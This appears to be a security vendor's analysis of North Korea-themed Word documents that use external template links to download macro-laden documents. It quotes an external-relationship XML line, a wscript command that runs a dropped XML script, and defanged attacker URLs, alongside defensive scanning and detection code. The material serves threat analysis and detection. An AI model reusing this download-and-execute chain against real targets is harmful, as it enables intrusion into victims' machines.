Malicious Word Documents with External Link of North Korea Related Materials

In previous posts, the ASEC analysis team has introduced various types of document-based malware. Among them, malicious documents with North Korea-related content were generally produced in the HWP file format; the details can be found in the earlier ASEC blog posts. This post introduces some of the DOC (Word) documents with North Korea-related content that the ASEC analysis team has collected.

These documents are presumed to be distributed via email, and they contained the content listed below. When opened, the document connects to an external URL through a relationship written in its XML and downloads an additional document file. Within the XML, the target address is defined with TargetMode="External", as shown in the examples below. Most of the recently distributed North Korea-related documents use this attack technique, so users must be aware of it to prevent damage.

Example of External attack (part of the XML code)
Target="hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6" TargetMode="External"/>
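As an added example (not part of the ASEC post), the following Python scans every relationship part of a .docx for entries with TargetMode="External" that point at an http(s) URL, which is the indicator visible in the XML fragment above. It builds its own sample document in memory; placing the link in word/_rels/settings.xml.rels as an attachedTemplate relationship is an assumption about the document layout, and the URL is a placeholder.

```python
"""Scan an OOXML package (.docx/.dotm) for relationships that point at an
external URL, the "External" technique shown above. Added example, not
ASEC's tooling; the sample document is constructed with a placeholder URL."""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")

def find_external_rels(docx_bytes: bytes) -> list:
    """Return every Relationship with TargetMode="External" whose Target is
    an http(s) URL, from all *.rels parts in the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                target = rel.get("Target", "")
                if (rel.get("TargetMode") == "External"
                        and target.lower().startswith(("http://", "https://"))):
                    hits.append({"part": name,
                                 "type": rel.get("Type", "").rsplit("/", 1)[-1],
                                 "target": target})
    return hits

def build_sample_docx(template_url: str) -> bytes:
    """Constructed sample: a minimal .docx whose settings.xml.rels carries an
    attachedTemplate relationship (assumed layout) to template_url."""
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
            f'Target="{template_url}" TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()

if __name__ == "__main__":
    # Placeholder URL; the real samples used the hxxp addresses listed in the post.
    sample = build_sample_docx("http://example.invalid/update/normal.dotm?q=6")
    for hit in find_external_rels(sample):
        print(f"{hit['part']}: {hit['type']} -> {hit['target']}")
```

A relationship whose Target is a local part name (for example Normal.dotm) is not reported, so the scan flags only remote templates and similar external links.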

[Document 1] Filename: Questionnaire.docx

● External URL: hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6

[Document 2] Filename: Business Report.docx

● External URL: hxxp://koreacit.co.kr/skin/new/basic/update/temp?q=6

[Document 3] Filename: Analysis of North Korea’s 8th Party Congress.docx

● External URL: hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6

[Document 4] Filename: Conclusion of the Party Congress.docx

● External URL: hxxps://reform-ouen.com/wp-includes/css/dist/nux/dotm/dwn.php?id=0119

[Document 5] Filename: 2021-0112 Comprehensive Analysis of the Party Congress.docx

● External URL: hxxps://reform-ouen.com/wp-includes/css/dist/nux/dotm/dwn.php?id=0119

Because [Documents 1, 2, 3] were protected, the ASEC analysis team could not open the files right away and first had to unlock them. [Documents 1, 2], which are Word files with VBA macros, appear to follow the operation flow shown below and are explained here.

[Figure 1] – Operation flow

[Document 1] contains a questionnaire on North Korea, and the file is protected. Inside the document is the following XML, which connects to the external address and downloads an additional malicious macro-enabled Word document.

[Figure 3] – External Access XML

The document downloaded from ‘hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6’ is also a Word document and contains a malicious macro. The macro code is obfuscated, as shown below. When run, it creates a malicious XML file in the Templates folder, where the Office user’s default template files are located, and executes it. The figure below shows intermediate code obtained while debugging the obfuscated macro; the path of the XML file to be created and its details can be seen there.

[Figure 4] – Macro debugging intermediate code

  • Command: wscript.exe //e:vbscript //b C:\Users\[user name]\AppData\Roaming\Microsoft\Templates\1589989024.xml
[Figure 5] – Details of 1589989024.xml

As shown in the figure above, the created XML file attempts to connect to an additional malicious network address.
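The execution step above (a script host launched with //e:vbscript against an .xml file in the Templates folder) can be checked for in process-creation logs. The following Python is an added example, not ASEC’s tooling; the command lines it scans are constructed, with "alice" as a placeholder user name.

```python
"""Flag process-creation command lines matching the execution step above:
a script host forced into the VBScript engine (//e:vbscript) to run a file
without a script extension. Added example, not ASEC tooling; the sample
command lines are constructed."""
import re
from typing import Optional

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_EXTS = {"vbs", "vbe", "js", "jse", "wsf", "wsh"}
FIRST_TOKEN_RE = re.compile(r'\s*(?:"([^"]+)"|(\S+))')
ENGINE_RE = re.compile(r"//e:(\w+)", re.IGNORECASE)
LAST_TOKEN_RE = re.compile(r'(?:"([^"]+)"|(\S+))\s*$')

def classify(cmdline: str) -> Optional[dict]:
    """Return a finding when cmdline abuses a script host's engine override
    to execute a non-script file (such as an .xml in the Templates folder)."""
    m = FIRST_TOKEN_RE.match(cmdline)
    exe = ((m.group(1) or m.group(2)) if m else "").lower()
    if not exe.endswith(SCRIPT_HOSTS):
        return None
    engine = ENGINE_RE.search(cmdline)
    if not engine:
        return None            # without //e: the engine follows the extension
    t = LAST_TOKEN_RE.search(cmdline)
    target = (t.group(1) or t.group(2)) if t else ""
    ext = target.rsplit(".", 1)[-1].lower() if "." in target else ""
    if ext in SCRIPT_EXTS:
        return None            # a real script file; the override is harmless
    return {"host": exe.rsplit("\\", 1)[-1],
            "engine": engine.group(1).lower(),
            "target": target,
            "in_templates": "\\microsoft\\templates\\" in target.lower()}

def scan(cmdlines) -> list:
    """Run classify over many command lines and keep only the findings."""
    return [hit for hit in map(classify, cmdlines) if hit]

# Constructed sample command lines (Sysmon event 1 / Security 4688 style).
SAMPLE_CMDLINES = [
    r"wscript.exe //e:vbscript //b C:\Users\alice\AppData\Roaming\Microsoft\Templates\1589989024.xml",
    r'"C:\Windows\System32\wscript.exe" //e:vbscript "C:\Users\alice\AppData\Local\Temp\x.txt"',
    r'"C:\Windows\System32\wscript.exe" "C:\Scripts\backup.vbs"',
    r"cscript.exe //nologo C:\Windows\System32\slmgr.vbs /dlv",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_CMDLINES):
        print(hit)
```

The in_templates flag singles out the exact location used here; a finding with the engine override on any non-script extension is still worth reviewing.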

[Document 2] also downloads an intermediate-stage Word document with a malicious macro. Given that the operation flow and the obfuscated macro format are very similar, the two documents were likely produced by the same attacker group. The C2 addresses of the two documents are summarized below; their goal is presumed to be downloading and running additional malware.

[Document 1] Filename: Questionnaire.docx

○ Download address for additional DOC word file after connecting to XML External: hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6

○ Additional access address for XML created from document above:
hxxp://heritage2020.cafe24.com/skin/board/gallery/log/list.php?query=1

[Document 2] Filename: Business Report.docx

○ Download address for additional DOC word file after connecting to XML External:
hxxp://koreacit.co.kr/skin/new/basic/update/temp?q=6

○ Additional access address for XML created from document above:
hxxp://koreacit.co.kr/skin/new/basic/update/list.php?query=1

As mentioned above, these documents are sent via email and are very likely aimed at people working in North Korea-related fields. Since social engineering attacks via email have increased substantially, users must remain vigilant to prevent damage from such attacks.

AhnLab detects and blocks the files above using the following aliases:

[File Detection]
Downloader/DOC.External
Downloader/XML.Generic
Downloader/DOC.Generic
Downloader/DOC.Agent

[IOC Info]
hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6
hxxp://heritage2020.cafe24.com/skin/board/gallery/log/list.php?query=1
hxxp://koreacit.co.kr/skin/new/basic/update/temp?q=6
hxxp://koreacit.co.kr/skin/new/basic/update/list.php?query=1
hxxps://reform-ouen.com/wp-includes/css/dist/nux/dotm/dwn.php?id=0119
hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6
